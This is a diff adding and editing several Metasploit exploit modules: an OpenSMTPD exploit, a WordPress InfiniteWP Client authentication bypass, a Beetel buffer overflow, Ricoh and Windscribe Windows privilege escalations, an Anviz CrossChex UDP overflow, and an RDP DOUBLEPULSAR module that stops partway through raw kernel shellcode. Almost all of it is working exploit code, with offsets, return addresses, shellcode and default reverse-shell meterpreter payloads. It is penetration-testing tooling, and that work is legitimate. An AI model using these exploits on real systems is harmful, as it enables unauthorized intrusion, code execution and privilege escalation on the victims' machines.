+    # Create the mail body with comment slide and payload
+    body = "\r\n" + "#\r\n" * 15 + payload.encoded
+
+    sploit = {
+      nil                   => /220.*OpenSMTPD/,
+      "HELO #{me}"          => /250.*pleased to meet you/,
+      "MAIL FROM:<#{from}>" => /250.*Ok/,
+      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
+      'DATA'                => /354 Enter mail.*itself/,
+      body                  => nil,
+      '.'                   => /250.*Message accepted for delivery/,
+      'QUIT'                => /221.*Bye/
+    }
+
+    print_status('Connecting to OpenSMTPD')
+    connect
+
+    print_status('Saying hello and sending exploit')
+    sploit.each do |line, pattern|
+      send_expect(
+        line,
+        pattern,
+        sock:    sock,
+        timeout: datastore['ExpectTimeout'],
+        newline: "\r\n"
+      )
+    end
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  ensure
+    disconnect
+  end
+
+end
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
+      'Description'    => %q{
+        This module exploits an authentication bypass in the WordPress
+        InfiniteWP Client plugin to log in as an administrator and execute
+        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.
+
+        The module will attempt to retrieve the original PLUGIN_FILE contents
+        and restore them after payload execution. If VerifyContents is set,
+        which is the default setting, the module will check to see if the
+        restored contents match the original.
+
+        Note that a valid administrator username is required for this module.
+
+        WordPress >= 4.9 is currently not supported due to a breaking WordPress
+        API change. Tested against 4.8.3.
+      },
+      'Author'         => [
+        'WebARX', # Discovery
+        'wvu'     # Module
+      ],
+      'References'     => [
+        ['WPVDB', '10011'],
+        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
+        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
+        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
+      ],
+      'DisclosureDate' => '2020-01-14',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Privileged'     => false,
+      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
+    ))
+
+    register_options([
+      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
+      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
+    ])
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def plugin_file
+    datastore['PLUGIN_FILE']
+  end
+
+  def plugin_uri
+    normalize_uri(wordpress_url_plugins, plugin_file)
+  end
+
+  def check
+    unless wordpress_and_online?
+      return CheckCode::Unknown('Is the site online and running WordPress?')
+    end
+
+    unless (version = wordpress_version)
+      return CheckCode::Unknown('Could not detect WordPress version')
+    end
+
+    if Gem::Version.new(version) >= Gem::Version.new('4.9')
+      return CheckCode::Safe("WordPress #{version} is an unsupported target")
+    end
+
+    vprint_good("WordPress #{version} is a supported target")
+
+    check_version_from_custom_file(
+      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
+      /^= ([\d.]+)/,
+      '1.9.4.5'
+    )
+  end
+
+  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
+  def auth_bypass
+    json = {
+      'iwp_action' => %w[add_site readd_site].sample,
+      'params'     => {'username' => username}
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => wordpress_url_backend,
+      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
+    )
+
+    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
+      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
+    end
+
+    print_good("Successfully obtained cookie for #{username}")
+    vprint_status("Cookie: #{cookie}")
+
+    cookie
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    print_status("Bypassing auth for #{username} at #{full_uri}")
+    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
+      fail_with(Failure::NoAccess, "Could not log in as #{username}")
+    end
+
+    print_good("Successfully logged in as #{username}")
+    write_and_exec_payload
+  end
+
+  def write_and_exec_payload
+    print_status("Retrieving original contents of #{plugin_uri}")
+    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
+
+    unless contents
+      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
+    end
+
+    print_good("Successfully retrieved original contents of #{plugin_uri}")
+    vprint_status('Contents:')
+    print(contents)
+
+    print_status("Overwriting #{plugin_uri} with payload")
+    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
+      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
+    end
+
+    print_good("Successfully overwrote #{plugin_uri} with payload")
+
+    print_status("Requesting payload at #{plugin_uri}")
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => plugin_uri
+    }, 0)
+
+    restore_contents(contents)
+  end
+
+  def restore_contents(og_contents)
+    print_status("Restoring original contents of #{plugin_uri}")
+    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
+      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
+    end
+
+    return unless datastore['VerifyContents']
+
+    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
+
+    unless contents == og_contents
+      fail_with(Failure::UnexpectedReply,
+                "Current contents of #{plugin_uri} DO NOT match original!")
+    end
+
+    print_good("Current contents of #{plugin_uri} match original!")
+  end
+
+end
@@ -11,43 +11,39 @@ class MetasploitModule < Msf::Exploit

  def initialize(info = {})
    super(update_info(info,
-      'Name'    => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
+      'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
      'Description' => %q{
-        This module exploits a stack-based buffer overflow on Beetel Connection Manager. The
-        vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini
-        file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP
-        SP3 and Windows 7 SP1.
+        This module exploits a stack-based buffer overflow in Beetel Connection
+        Manager. The vulnerability exists in the parsing of the UserName
+        parameter in the NetConfig.ini file.
+
+        The module has been tested successfully against version
+        PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.
      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          "metacom", # Vuln/PoC
-          "wvu" # Metasploit
-        ],
-      'References'     =>
-        [
-          [ "OSVDB", "98714" ],
-          [ "EDB", "28969" ]
-        ],
-      'Payload'        =>
-        {
-          "Space"       => 1504,
-          "BadChars"    => "\x00\x09\x0a\x0b\x0c\x0d\x20",
-          "DisableNops" => true
-        },
-      'Platform'       => "win",
-      'Targets'        =>
-        [
-          ["PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)",
-            {
-              "Offset" => 468,
-              "Ret"    => 0x0105e2f6 # p/p/r (WaitingForm.dll 1.0.0.0)
-            }
-          ]
-        ],
-      'Privileged'     => false,
+      'License' => MSF_LICENSE,
+      'Author' => [
+        "metacom", # Vuln/PoC
+        "wvu" # Metasploit
+      ],
+      'References' => [
+        ["OSVDB", "98714"],
+        ["EDB", "28969"]
+      ],
+      'Payload' => {
+        "Space" => 1504,
+        "BadChars" => "\x00\x09\x0a\x0b\x0c\x0d\x20",
+        "DisableNops" => true
+      },
+      'Platform' => "win",
+      'Targets' => [
+        ["PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)", {
+          "Offset" => 468,
+          "Ret" => 0x0105e2f6 # p/p/r (WaitingForm.dll 1.0.0.0)
+        }]
+      ],
+      'Privileged' => false,
      'DisclosureDate' => "2013-10-12",
-      'DefaultTarget'  => 0
+      'DefaultTarget' => 0
    ))

    register_options([
@@ -0,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ricoh Driver Privilege Escalation',
+      'Description'    => %q(
+        Various Ricoh printer drivers allow escalation of
+        privileges on Windows systems.
+
+        For vulnerable drivers, a low-privileged user can
+        read/write files within the `RICOH_DRV` directory
+        and its subdirectories.
+
+        `PrintIsolationHost.exe`, a Windows process running
+        as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+        during the installation of a printer. A user can
+        elevate to SYSTEM by writing a malicious DLL to
+        the vulnerable driver directory and adding a new
+        printer with a vulnerable driver.
+
+        This module leverages the `prnmngr.vbs` script
+        to add and delete printers. Multiple runs of this
+        module may be required given successful exploitation
+        is time-sensitive.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+                            'Alexander Pudwill',  # discovery & PoC
+                            'Pentagrid AG',       # PoC
+                            'Shelby Pace'         # msf module
+                          ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-19363'],
+          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+        ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Platform'       => 'win',
+      'Payload'        =>
+      {
+      },
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'        =>
+        [[
+            'Windows', { 'Arch'  => [ ARCH_X86, ARCH_X64 ] }
+        ]],
+      'Notes'          =>
+      {
+        'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
+        'Reliability' =>  [ UNRELIABLE_SESSION ],
+        'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
+      },
+      'DisclosureDate' => "Jan 22 2020",
+      'DefaultTarget'  => 0
+    ))
+
+    self.needs_cleanup = true
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+    ])
+  end
+
+  def check
+    dir_name = "C:\\ProgramData\\RICOH_DRV"
+
+    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
+    driver_names = dir(dir_name)
+
+    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length
+
+    vulnerable = false
+    driver_names.each do |driver_name|
+      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
+      next unless directory?(full_path)
+      @driver_path = full_path
+
+      res = cmd_exec("icacls \"#{@driver_path}\"")
+      next unless res.include?('Everyone:')
+      next unless res.match(/\(F\)/)
+
+      vulnerable = true
+      break
+    end
+
+    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable
+
+    vprint_status("Vulnerable driver directory: #{@driver_path}")
+    CheckCode::Appears('Ricoh driver directory has full permissions')
+  end
+
+  def add_printer(driver_name)
+    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
+
+    dll_data = generate_payload_dll
+    dll_path = "#{@driver_path}\\headerfooter.dll"
+
+    temp_path = expand_path('%TEMP%\\headerfooter.dll')
+    vprint_status("Writing dll to #{temp_path}")
+
+    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
+    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
+    bat_file = <<~HEREDOC
+      :repeat
+      #{cp_cmd} && goto :repeat
+    HEREDOC
+
+    write_file(bat_file_path, bat_file)
+    write_file(temp_path, dll_data)
+    register_files_for_cleanup(bat_file_path, temp_path)
+
+    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
+    print_status("Adding printer #{@printer_name}...")
+    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
+    vprint_status("Executing script...")
+    cmd_exec(bat_cmd)
+  rescue Rex::Post::Meterpreter::RequestError => e
+    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+  end
+
+  def exploit
+    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
+
+    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
+
+    if sysinfo['Architecture'] != payload.arch.first
+      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
+    end
+
+    @driver_path = ''
+    unless check == CheckCode::Appears || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
+    end
+
+    @printer_name = Rex::Text.rand_text_alpha(5..9)
+    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
+    drvr_name = @driver_path.split('\\')
+    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
+    drvr_name = drvr_name[drvr_name_idx]
+
+    add_printer(drvr_name)
+  end
+
+  def cleanup
+    print_status("Deleting printer #{@printer_name}")
+    Rex.sleep(3)
+    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
+    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
+  end
+end
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Services
+  include Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Windscribe WindscribeService Named Pipe Privilege Escalation',
+      'Description'    => %q{
+        The Windscribe VPN client application for Windows makes use of a
+        Windows service `WindscribeService.exe` which exposes a named pipe
+        `\\.\pipe\WindscribeService` allowing execution of programs with
+        elevated privileges.
+
+        Windscribe versions prior to 1.82 do not validate user-supplied
+        program names, allowing execution of arbitrary commands as SYSTEM.
+
+        This module has been tested successfully on Windscribe versions
+        1.80 and 1.81 on Windows 7 SP1 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Emin Ghuliev', # Discovery and exploit
+        'bcoles'        # Metasploit
+      ],
+      'References'     =>
+        [
+          ['CVE', '2018-11479'],
+          ['URL', 'http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html'],
+          ['URL', 'https://pastebin.com/eLG3dpYK']
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        => [['Automatic', {}]],
+      'DisclosureDate' => '2018-05-24',
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+        },
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
+  end
+
+  def service_exists?(service)
+    srv_info = service_info(service)
+
+    if srv_info.nil?
+      vprint_warning 'Unable to enumerate Windows services'
+      return false
+    end
+
+    if srv_info && srv_info[:display].empty?
+      return false
+    end
+
+    true
+  end
+
+  def write_named_pipe(pipe, command)
+    kt = "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00"
+    kt << [command.force_encoding('UTF-8').codepoints.map { |c| "%04X" % c }.join].pack('H*')
+    kt << "\x00" * (32_005 - kt.length)
+
+    print_status "Sending #{command} to #{pipe} ..."
+
+    r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0, nil, 'OPEN_EXISTING', 0, nil)
+    handle = r['return']
+
+    if handle == 0xffffffff # INVALID_HANDLE_VALUE
+      print_error "Invalid handle. #{pipe} named pipe not found, or already opened"
+      return false
+    end
+
+    vprint_good("Opended #{pipe}! Proceeding ...")
+
+    begin
+      w = client.railgun.kernel32.WriteFile(handle, kt, kt.length, 4, nil)
+      if w['return'] == false
+        return false
+      end
+    ensure
+      session.railgun.kernel32.CloseHandle(handle)
+    end
+
+    true
+  rescue
+    false
+  end
+
+  def check
+    service = 'WindscribeService'
+
+    unless service_exists? service
+      return CheckCode::Safe("Service '#{service}' does not exist")
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_system?
+      fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
+    end
+
+    payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
+    payload_exe = generate_payload_exe
+    vprint_status "Writing payload (#{payload.encoded.length} bytes) to #{payload_path} ..."
+    write_file payload_path, payload_exe
+    register_file_for_cleanup payload_path
+
+    unless write_named_pipe("\\\\.\\pipe\\WindscribeService", payload_path)
+      fail_with Failure::Unknown, 'Failed to write to pipe'
+    end
+  end
+end
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  PACKET_LEN = 10
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Anviz CrossChex Buffer Overflow',
+      'Description'	=> %q{
+        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
+        triggering a stack buffer overflow.
+      },
+      'Author'	  	=>
+        [
+            'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit
+            'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>',   # original discovery/exploit
+            'agalway-r7',  # Module creation
+            'adfoster-r7' # Module creation
+        ],
+      'License'		  => MSF_LICENSE,
+      'References'	=>
+        [
+            ['CVE', '2019-12518'],
+            ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
+            ['EDB', '47734']
+        ],
+      'Payload'        =>
+        {
+            'Space'    => 8947,
+            'DisableNops' => true
+        },
+      'Arch' => ARCH_X86,
+      'EncoderType' => Msf::Encoder::Type::Raw,
+      'Privileged'	=> true,
+      'Platform' => 'win',
+      'DisclosureDate' => '2019-11-28',
+      'Targets'        =>
+          [
+            [
+              'Crosschex Standard x86 <= V4.3.12',
+              {
+                  'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
+                  'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+                  'Shift' => 4 # Positions payload to be written at beginning of ESP
+              }
+            ]
+          ],
+      'DefaultTarget'  => 0
+      ))
+    deregister_udp_options
+    register_options(
+        [
+            Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
+            Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
+            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
+        ])
+  end
+
+  def exploit
+    connect_udp
+
+    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
+    if res.empty?
+      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
+    end
+
+    print_status "CrossChex broadcast received, sending payload in response"
+    sploit = rand_text_english(target['Offset'])
+    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
+    sploit << payload.encoded
+
+    udp_sock.sendto(sploit, host, port)
+    print_status "Payload sent"
+    end
+end
@@ -0,0 +1,316 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::RDP
+
+  MAX_SHELLCODE_SIZE = 4096
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'               => 'RDP DOUBLEPULSAR Remote Code Execution',
+      'Description'        => %q{
+        This module executes a Metasploit payload against the Equation Group's
+        DOUBLEPULSAR implant for RDP.
+
+        While this module primarily performs code execution against the implant,
+        the "Neutralize implant" target allows you to disable the implant.
+      },
+      'Author'             => [
+        'Equation Group',  # DOUBLEPULSAR implant
+        'Shadow Brokers',  # Equation Group dump
+        'Luke Jennings',   # DOPU analysis and detection
+        'wvu',             # RDP DOPU analysis and module
+        'Tom Sellers',     # RDP DOPU analysis
+        'Spencer McIntyre' # RDP DOPU analysis
+      ],
+      'References'         => [
+        ['URL', 'https://github.com/countercept/doublepulsar-detection-script']
+      ],
+      'DisclosureDate'     => '2017-04-14', # Shadow Brokers leak
+      'License'            => MSF_LICENSE,
+      'Platform'           => 'win',
+      'Arch'               => ARCH_X64,
+      'Privileged'         => true,
+      'Payload'            => {
+        'Space'            => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
+        'DisableNops'      => true
+      },
+      'Targets'            => [
+        ['Execute payload (x64)',
+          'DefaultOptions' => {
+            'EXITFUNC'     => 'thread',
+            'PAYLOAD'      => 'windows/x64/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Neutralize implant',
+          'DefaultOptions' => {
+            'PAYLOAD'      => nil # XXX: "Unset" generic payload
+          }
+        ]
+      ],
+      'DefaultTarget'      => 0,
+      'Notes'              => {
+        'AKA'              => ['DOUBLEPULSAR'],
+        'RelatedModules'   => ['exploit/windows/smb/smb_doublepulsar_rce'],
+        'Stability'        => [CRASH_OS_DOWN],
+        'Reliability'      => [REPEATABLE_SESSION]
+      }
+    ))
+
+    register_advanced_options([
+      OptBool.new('DefangedMode',  [true, 'Run in defanged mode', true]),
+      OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])
+    ])
+  end
+
+  OPCODES = {
+    exec: 0x01,
+    ping: 0x02,
+    burn: 0x03
+  }.freeze
+
+  DOUBLEPULSAR_MAGIC = 0x19283744
+
+  # https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw
+  def parse_doublepulsar_ping(res)
+    return unless res && res.length == 288
+
+    magic,    _size,     major,   minor, build = res.unpack('V5')
+    sp_major, _sp_minor, _suites, prod,  arch  = res[-8..-1].unpack('v3C2')
+
+    return unless magic == DOUBLEPULSAR_MAGIC
+
+    ver_str = "#{major}.#{minor}.#{build}"
+    sp_str  = "SP#{sp_major}"
+
+    prod_str =
+      case prod
+      when 1
+        'Workstation'
+      when 2
+        'Domain Controller'
+      when 3
+        'Server'
+      end
+
+    arch_str =
+      case arch
+      when 1
+        'x86'
+      when 2
+        'x64'
+      end
+
+    "Windows #{prod_str} #{ver_str} #{sp_str} #{arch_str}"
+  end
+
+  def setup
+    super
+
+    rdp_connect
+    is_rdp, server_selected_protocol = rdp_check_protocol
+
+    fail_with(Failure::BadConfig, 'Target port is not RDP') unless is_rdp
+
+    case server_selected_protocol
+    when RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX
+      fail_with(Failure::BadConfig, 'DOUBLEPULSAR does not support NLA')
+    when RDPConstants::PROTOCOL_SSL
+      vprint_status('Swapping plain socket to SSL')
+      swap_sock_plain_to_ssl
+    end
+  rescue Rex::ConnectionError, RdpCommunicationError => e
+    fail_with(Failure::Disconnected, e.message)
+  end
+
+  def cleanup
+    rdp_disconnect
+
+    super
+  end
+
+  def check
+    print_status('Sending ping to DOUBLEPULSAR')
+    res = do_rdp_doublepulsar_pkt(OPCODES[:ping])
+
+    unless (info = parse_doublepulsar_ping(res))
+      print_error('DOUBLEPULSAR not detected or disabled')
+      return CheckCode::Safe
+    end
+
+    print_warning('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')
+    print_good("Target is #{info}")
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    if datastore['DefangedMode']
+      warning = <<~EOF
+
+
+        Are you SURE you want to execute code against a nation-state implant?
+        You MAY contaminate forensic evidence if there is an investigation.
+
+        Disable the DefangedMode option if you have authorization to proceed.
+      EOF
+
+      fail_with(Failure::BadConfig, warning)
+    end
+
+    # No ForceExploit because check is accurate
+    unless check == CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')
+    end
+
+    case target.name
+    when 'Execute payload (x64)'
+      print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
+      shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
+      shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
+      vprint_status("Total shellcode length: #{shellcode.length} bytes")
+
+      print_status('Sending shellcode to DOUBLEPULSAR')
+      res = do_rdp_doublepulsar_pkt(OPCODES[:exec], shellcode)
+    when 'Neutralize implant'
+      return neutralize_implant
+    end
+
+    if res
+      fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')
+    end
+
+    print_good('Payload execution successful')
+  end
+
+  def neutralize_implant
+    print_status('Neutralizing DOUBLEPULSAR')
+    res = do_rdp_doublepulsar_pkt(OPCODES[:burn])
+
+    if res
+      fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')
+    end
+
+    print_good('Implant neutralization successful')
+  end
+
+  def do_rdp_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)
+    rdp_send_recv(make_rdp_mcs_doublepulsar(opcode, body))
+  rescue Errno::ECONNRESET, RdpCommunicationError
+    nil
+  end
+
+=begin
+  MULTIPOINT-COMMUNICATION-SERVICE T.125
+      DomainMCSPDU: channelJoinConfirm (15)
+          channelJoinConfirm
+              result: rt-domain-not-hierarchical (2)
+              initiator: 14120
+              requested: 6402
+=end
+  def make_rdp_mcs_doublepulsar(opcode, body)
+    data  = "\x3c" # channelJoinConfirm
+    data << [DOUBLEPULSAR_MAGIC].pack('V')
+    data << [opcode].pack('v')
+
+    if body
+      data << [body.length, body.length, 0].pack('V*')
+      data << body
+    end
+
+    build_data_tpdu(data)
+  end
+
+  # ring3 = user mode encoded payload
+  # proc_name = process to inject APC into
+  def make_kernel_user_payload(ring3, proc_name)
+    sc = make_kernel_shellcode(proc_name)
+
+    sc << [ring3.length].pack('S<')
+    sc << ring3
+
+    sc
+  end
+
+  def generate_process_hash(process)
+    # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    proc_hash = 0
+    process << "\x00"
+
+    process.each_byte do |c|
+      proc_hash = ror(proc_hash, 13)
+      proc_hash += c
+    end
+
+    [proc_hash].pack('l<')
+  end
+
+  def ror(dword, bits)
+    (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
+  end
+
+  def make_kernel_shellcode(proc_name)
+    # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    # Length: 780 bytes
+    "\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" \
+    "\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" \
+    "\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" \
+    "\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" \
